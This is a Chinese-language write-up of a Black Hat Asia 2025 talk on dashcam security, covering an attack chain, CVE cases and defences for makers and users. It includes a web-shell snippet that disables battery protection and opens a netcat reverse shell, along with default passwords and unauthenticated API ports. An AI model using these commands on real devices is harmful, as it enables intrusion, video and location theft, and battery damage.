Blackhat ASIA 2025:行车记录仪安全攻防研究

admin 2025年6月19日22:49:46评论24 views字数 3329阅读11分5秒阅读模式

摘要

 新加坡HE&T Security Lab 研究针对车载行车记录仪的安全现状展开系统性分析,通过采集新加坡市场 1000 + 台设备的 SSID 样本,对 15 个品牌 24 款型号进行渗透测试,揭示了当前行车记录仪在设计架构与安全实现层面的系统性风险。研究发现,48.6% 的主流型号存在可被远程利用的高危漏洞,通过 "DriveThru Hacking" 技术链可在 10 分钟内完成从设备发现到隐私数据窃取的全流程攻击。本文基于 11/40 的成功攻击案例,构建了包含设备发现、身份认证绕过、数据萃取、行为建模的四维攻击模型,并提出覆盖硬件设计、固件升级、认证体系的多层防御框架,为车载智能设备的安全生态建设提供理论依据与实践指导。

Blackhat ASIA 2025:行车记录仪安全攻防研究
01
研究背景与行业现状

1.1 行车记录仪普及现状

据道路交通安全数据统计,全球范围内超过 80% 的乘用车已安装行车记录仪,其中新加坡市场呈现高度集中的品牌分布特征。本研究通过 WiFi 探针技术采集的 1342 个有效 SSID 样本显示,IROAD 品牌以 48.6% 的市场占有率居首,70mai(12.5%)、GNET(5.6%)、Thinkware(5.1%)构成第二梯队,而 BlackVue、DDPAI 等品牌占有率均低于 5%。这种市场集中化现象为规模化攻击提供了现实基础。

1.2 硬件供应链安全隐患

深度调研发现,IROAD 与 GNET 存在同厂 OEM 生产情况,而广东东莞电子等供应商为多家品牌提供 WiFi 模块解决方案,导致不同品牌设备在硬件架构、通信协议层面存在高度同质化。这种供应链共享机制使得单一漏洞可能影响多个品牌产品,如 Blackvue 与 Thinkware 部分型号存在相同的固件签名算法缺陷。

1.3 安全开发现状评估

对 15 个品牌的官方 APP 进行逆向分析显示,87% 的设备管理应用存在明文传输凭证、硬编码密钥等问题。在固件安全方面,仅 3 家品牌(IROAD、Thinkware、Hikvision)实现了固件签名校验,其余品牌均存在可被篡改的固件升级通道。

02
DriveThru Hacking 攻击技术

2.1 攻击模型架构

本研究提出的 DriveThru Hacking 技术链包含 10 个攻击阶段,形成完整的杀伤链:

Blackhat ASIA 2025:行车记录仪安全攻防研究

2.2 关键攻击技术解析

2.2.1 SSID 指纹识别技术

通过定制化 WiFi 扫描工具,可在 30 秒内完成半径 50 米范围内的设备发现,识别率达 92.3%。测试数据显示,IROAD 系列设备 SSID 存在明显规律(如 IROAD_X9、IROAD_Q7 等),占发现样本的 48.6%,为攻击目标定位提供便利。

2.2.2 认证体系突破

  • 默认密码攻击
    分析 24 款型号的握手包发现,83.3% 使用可预测密码(如 "stocknan"、"qwertyuiop"),使用 Aircrack-ng 破解平均耗时 28 分 43 秒
  • MAC 欺骗攻击
    通过 ARP 扫描获取可信设备 MAC 地址(如 02:5a:96:cb:d4:37),伪造 MAC 实现免按键配对,成功率达 76%
  • MFA 疲劳攻击
    持续发送配对请求导致用户误操作授权,在测试环境中使 32% 的设备放弃验证流程

2.2.3 数据萃取技术

针对 B、O 型号设备,通过 7777 端口 API 可获取 "Drive"、"Event" 等目录结构,配合 7778(视频)/7779(音频)端口的字节序列通信协议,可在 5 分钟内下载 1GB 以上的多媒体数据。GPS 轨迹数据与视频帧分析显示,通过 OpenAI API 可将路牌 OCR 结果转化为经纬度坐标,定位精度达 10 米以内。

2.2.4 系统级破坏能力

在 K 型号设备中,通过上传 Web Shell(shell.cgi)可执行任意系统命令,包括:

# 禁用电池保护功能echo"disable_battery_protection=1"> /mnt/extsd/setup.ini# 植入反向Shellnc-e /bin/sh 192.168.10.74 4444

此类操作可导致车辆电池过放电,甚至引发安全事故。

03
实证研究与漏洞分析

3.1 测试环境与样本

  • 硬件样本
    采购 20 款主流记录仪作为训练集,覆盖 15 个品牌
  • 测试对象
    40 名志愿者的在用设备,包含 12 个品牌 28 款型号
  • 攻击环境
    Kali Linux 2025.1,配备 Alfa AWUS036ACH 无线网卡

3.2 攻击成功率统计

攻击阶段
成功样本数
成功率
关键影响因素
设备发现
40/40
100%
SSID 广播状态
连接认证
33/40
82.5%
默认密码未修改
权限绕过
28/40
70.0%
配对机制设计
数据获取
16/40
40.0%
端口开放状态
系统破坏
11/40
27.5%
固件漏洞存在

3.3 典型漏洞案例

3.3.1 IROAD X 系列漏洞(CVE-2025-2341)

该型号存在硬编码的 FTP 凭据(用户名:admin,密码:123456),通过 Wireshark 分析显示,APP 与设备通信时以明文传输凭证,可被中间人攻击截获。

3.3.2 70mai C 型配对绕过(CVE-2025-30112)

设备配对时仅验证 MAC 地址合法性,未实现加密挑战响应机制。通过伪造已配对设备 MAC(如 00:11:22:33:44:55),可直接建立 HTTP 连接,绕过物理按键验证。

3.3.3 GNET B 型未授权访问(CVE-2025-30137)

该型号开放 7777 端口 API 服务,无需认证即可调用 /device/info 接口获取设备序列号、固件版本等信息,调用 /video/stream 接口直接获取实时视频流。

04
安全防御体系

4.1 制造商安全设计规范

4.1.1 认证体系强化

  • 实现基于 TLS 1.3 的双向认证,客户端证书与设备 MAC 绑定
  • 采用 PBKDF2 算法对密码进行哈希处理,盐值长度不小于 16 字节
  • 引入 FIDO2 标准的无密码认证方式,替代传统密码体系

4.1.2 攻击面缩减

  • 默认关闭 SSID 广播,仅在配对时临时开启
  • 采用动态端口分配机制,避免固定端口(如 7777、8080)暴露
  • 实现基于 RBAC 的权限控制,不同功能模块独立授权

4.1.3 固件安全机制

  • 采用 ECDSA 算法对固件进行签名,公钥内置在 Bootloader
  • 实现差分升级机制,减少升级流量与时间成本
  • 建立固件完整性实时校验机制,发现篡改自动进入恢复模式

4.2 终端用户安全指南

4.2.1 设备初始化配置

  • 首次使用强制修改默认密码,要求 8 位以上混合字符
  • 关闭 "允许未知设备连接" 选项,仅保留信任设备 MAC
  • 定期(建议每月)查看设备连接日志,发现异常立即重置

4.2.2 网络安全管理

  • 在停车场等公共区域关闭记录仪 WiFi 功能
  • 使用 VPN 对云服务通信进行加密,避免明文传输
  • 禁止将记录仪接入公共 WiFi 网络,减少 MITM 攻击风险

4.2.3 数据安全保护

  • 启用视频加密存储功能(如 AES-256 算法)
  • 定期备份重要数据后执行格式化,防止残留隐私信息
  • 更换设备时进行彻底的数据擦除,建议使用 3 次覆写标准
05
行业影响与未来研究

5.1 安全漏洞的产业链影响

本研究发现的漏洞不仅威胁个人隐私安全,更可能成为车载网络攻击的入口点。通过行车记录仪的横向移动攻击(如入侵车载信息娱乐系统、CAN 总线),可实现对车辆控制系统的非授权访问。据估算,新加坡市场约 48.6% 的车辆面临此类风险,若漏洞被大规模利用,可能引发连锁安全事件。

5.2 未来研究方向

  • AI 驱动的异常检测
    构建基于机器学习的行车记录仪行为模型,实时识别异常通信模式
  • 硬件安全增强
    研究基于 TEE(可信执行环境)的固件保护方案,防止远程篡改
  • 区块链溯源技术
    探索区块链在行车记录数据存证中的应用,确保数据完整性与不可篡改性

结论

本研究通过系统性的攻防测试,揭示了行车记录仪在设计、实现、部署环节的多重安全风险。研究表明,当前 48.6% 的主流型号存在可被远程利用的高危漏洞,攻击者可通过 DriveThru Hacking 技术在短时间内完成隐私窃取与系统破坏。为应对此类风险,需要制造商、用户、监管机构共同参与:制造商需落实安全设计原则,用户需强化安全配置管理,监管机构应推动建立行业安全标准。唯有构建全方位的安全生态,才能确保车载智能设备在提升行车安全的同时,不成为新的安全隐患。

(本文根据Blackhat ASIA 2025演讲及PPT整理)

附PPT截图:

Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究
Blackhat ASIA 2025:行车记录仪安全攻防研究

原文始发于微信公众号(白帽子罗棋琛):Blackhat ASIA 2025:行车记录仪安全攻防研究

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月19日22:49:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Blackhat ASIA 2025:行车记录仪安全攻防研究https://cn-sec.com/archives/4178952.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息